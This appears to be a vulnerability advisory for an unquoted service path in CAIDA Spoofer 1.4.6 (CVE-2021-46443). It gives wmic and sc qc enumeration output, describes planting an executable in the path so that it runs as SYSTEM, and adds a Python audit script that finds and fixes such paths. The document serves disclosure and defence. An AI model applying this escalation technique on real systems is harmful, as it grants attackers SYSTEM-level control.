Spoofer 1.4.6 Privilege Escalation / Unquoted Service Path
# Exploit Title: Spoofer 1.4.6 Local Privilege Escalation via Unquoted Service Path
# Date: 24/01/2022
# Exploit Author: Asim Sattar (@M_Asim_1)
# Vendor Homepage: https://www.caida.org/projects/spoofer/
# Software Link: https://www.caida.org/projects/spoofer/downloads/Spoofer-1.4.6-win32.exe
# Version: 1.4.6
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46443
Description:
-------------
CAIDA Spoofer 1.4.6 installs a service (spoofer-scheduler) with an unquoted
service path. Because this service runs as SYSTEM, this creates a local
privilege escalation vulnerability. To exploit this vulnerability, a local
attacker can insert an executable in the path of the service. Rebooting the
system or restarting the service will then run the malicious executable
with elevated privileges.
------------------
Proof of Concept:
------------------
C:\Users\asim.sattar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Spoofer Scheduler    spoofer-scheduler    C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe    Auto

C:\Users\asim.sattar>sc qc "spoofer-scheduler"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: spoofer-scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Spoofer Scheduler
        DEPENDENCIES       : tcpip
        SERVICE_START_NAME : LocalSystem

Regards,
Asim Sattar
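
A defensive check for the condition shown in the proof of concept, as an added example that is not part of the original advisory: it parses `sc qc`-style output, flags services whose unquoted executable path contains a space, and returns the quoted value the service configuration should carry. The sample input and all function names are constructed for illustration, and treating the first `.exe` as the end of the executable path is an assumption.

```python
import re

# Constructed `sc qc`-style input; only the first entry mirrors the advisory.
SAMPLE = r"""
SERVICE_NAME: spoofer-scheduler
        BINARY_PATH_NAME   : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: quoted-svc
        BINARY_PATH_NAME   : "C:\Program Files\Vendor\agent.exe" --run
        SERVICE_START_NAME : LocalSystem
SERVICE_NAME: nospace-svc
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k netsvcs
        SERVICE_START_NAME : NT AUTHORITY\LocalService
"""

def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one field dict per service."""
    blocks = re.split(r"(?m)^(?=SERVICE_NAME:)", text)
    parsed = [dict(re.findall(r"(?m)^[ \t]*([A-Z_]+)[ \t]*:[ \t]*(.*?)[ \t]*$", b)) for b in blocks]
    return [f for f in parsed if "SERVICE_NAME" in f]

def split_unquoted(binpath):
    """Return (exe, args) for an unquoted command line, or None if it is quoted."""
    s = binpath.strip()
    if s.startswith('"'):
        return None
    m = re.match(r"(?i)(.+?\.exe)(?=\s|$)(.*)", s)  # assumption: path ends at first .exe
    return (m.group(1), m.group(2)) if m else (s, "")

def audit(text):
    """Flag services whose unquoted executable path contains a space."""
    findings = []
    for svc in parse_sc_qc(text):
        parts = split_unquoted(svc.get("BINARY_PATH_NAME", ""))
        if parts is None or " " not in parts[0]:
            continue
        exe, args = parts
        findings.append({
            "service": svc["SERVICE_NAME"],
            "account": svc.get("SERVICE_START_NAME", ""),
            # Earlier paths Windows may resolve first; verify none exist and
            # that non-admin users cannot write to their parent directories.
            "check_paths": [exe[:i] + ".exe" for i, c in enumerate(exe) if c == " "],
            "fixed_binpath": f'"{exe}"{args}',
        })
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

The `fixed_binpath` value is what the service's binary path should be set to so that the full path is resolved as a single token.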